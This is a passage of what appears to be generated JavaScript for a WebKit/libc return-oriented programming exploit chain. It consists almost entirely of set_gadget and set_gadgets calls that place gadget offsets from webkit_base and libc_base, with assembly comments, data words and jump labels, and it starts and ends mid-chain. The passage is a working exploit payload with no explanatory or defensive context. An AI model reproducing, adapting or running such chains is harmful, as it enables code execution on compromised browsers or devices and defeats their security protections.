set_gadget(libc_base+759608,); //pop rax
//L3216:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+196200, //L3218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+196248, //L3221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+196216, //L3219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3218:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3219:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3220:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3221:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+196360, //L3222+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+196352, //L3222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3222:
db([0, 0]); // 0x0
set_gadgets([
ropchain+196376, //L3222+24
ropchain+200688, //L3217
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3223:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3225:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+196512, //L3228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196496, //L3226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3226:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+196600, //L3229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196616, //L3231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3232:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+196696, //L3234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3234:
db([0, 0]); // 0x0
//L3233:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+196744, //L3236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3236:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3238:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+196864, //L3241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196848, //L3239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+197008, //L3244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+196976, //L3242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+196992, //L3243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3242:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3243:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+197088, //L3245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3245:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3247:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+197208, //L3250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197192, //L3248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3248:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3250:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+197384, //L3253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197400, //L3254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197352, //L3251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+197368, //L3252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3251:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3252:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3253:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3254:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+197560, //L3258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+197528, //L3256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+197544, //L3257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3255:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L3256:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3257:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3258:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+197648, //L3259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197664, //L3260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3259:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3260:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+197840, //L3262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+197856, //L3263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+197824, //L3261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3261:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3262:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3263:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+197968, //L3265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+198016, //L3268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+197984, //L3266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3265:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3266:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3268:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+198128, //L3269+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+198120, //L3269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3269:
db([0, 0]); // 0x0
set_gadgets([
ropchain+198144, //L3269+24
ropchain+198160, //L3264
libc_base+782311, //pop rsp
ropchain+198176, //L3270
//L3264:
libc_base+782311, //pop rsp
ropchain+200688, //L3271
//L3270:
libc_base+764760, //pop rsi
ropchain+198216, //L3272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3274:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198336, //L3277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198320, //L3275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3275:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+198480, //L3280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198448, //L3278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+198464, //L3279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3278:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3279:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3280:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+198560, //L3281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3281:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3283:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198680, //L3286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198664, //L3284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+198824, //L3289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+198792, //L3287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+198808, //L3288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+198912, //L3291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3290:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3291:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+198968, //L3292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3292:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3294:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+199048, //L3296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3296:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+199160, //L3297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3297:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3299:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+199280, //L3302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199264, //L3300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3300:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3302:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+199424, //L3305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199392, //L3303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+199408, //L3304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3303:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3304:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3305:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199504, //L3306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3306:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3307:
db([32, 0]); // 0x20
set_gadget(libc_base+144605,); //pop rdi
//L3308:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+199632, //L3310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+199616, //L3309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3309:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3310:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+199712, //L3311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3311:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3313:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+199832, //L3316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+199816, //L3314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3314:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3316:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+199912, //L3318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+199944, //L3320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L3319:
ropchain+200072, //L3317
libc_base+144605 //pop rdi
]);
//L3320:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+200048, //L3322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200064, //L3321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L3322:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L3321:
db([0, 0]); // 0x0
//L3317:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L3323:
libc_base+764760, //pop rsi
ropchain+200144, //L3324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3326:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200264, //L3329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200248, //L3327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+200408, //L3332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200376, //L3330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200392, //L3331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3330:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3331:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3332:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+200496, //L3334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3333:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3334:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200552, //L3335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3335:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3337:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+200632, //L3339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+196704, //L3233
//L3271:
//L3217:
//L3340:
libc_base+764760, //pop rsi
ropchain+200728, //L3341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3341:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3343:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+200848, //L3346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+200832, //L3344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3344:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3346:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201040, //L3351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+201056, //L3352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+200992, //L3348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201024, //L3350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3348:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3349:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3350:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3351:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3352:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+201168, //L3353+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+201160, //L3353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L3353:
db([0, 0]); // 0x0
set_gadgets([
ropchain+201184, //L3353+24
ropchain+205424, //L3347
libc_base+764760, //pop rsi
ropchain+201224, //L3354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3354:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3356:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201344, //L3359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201328, //L3357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3357:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3359:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201488, //L3362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201456, //L3360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+201472, //L3361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3360:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3361:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+201568, //L3363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3363:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3365:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201688, //L3368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201672, //L3366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3366:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3368:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+201832, //L3371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+201800, //L3369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+201816, //L3370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L3369:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3370:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3371:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+201920, //L3373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L3372:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L3373:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+201976, //L3374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L3374:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3376:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+202056, //L3378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3378:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
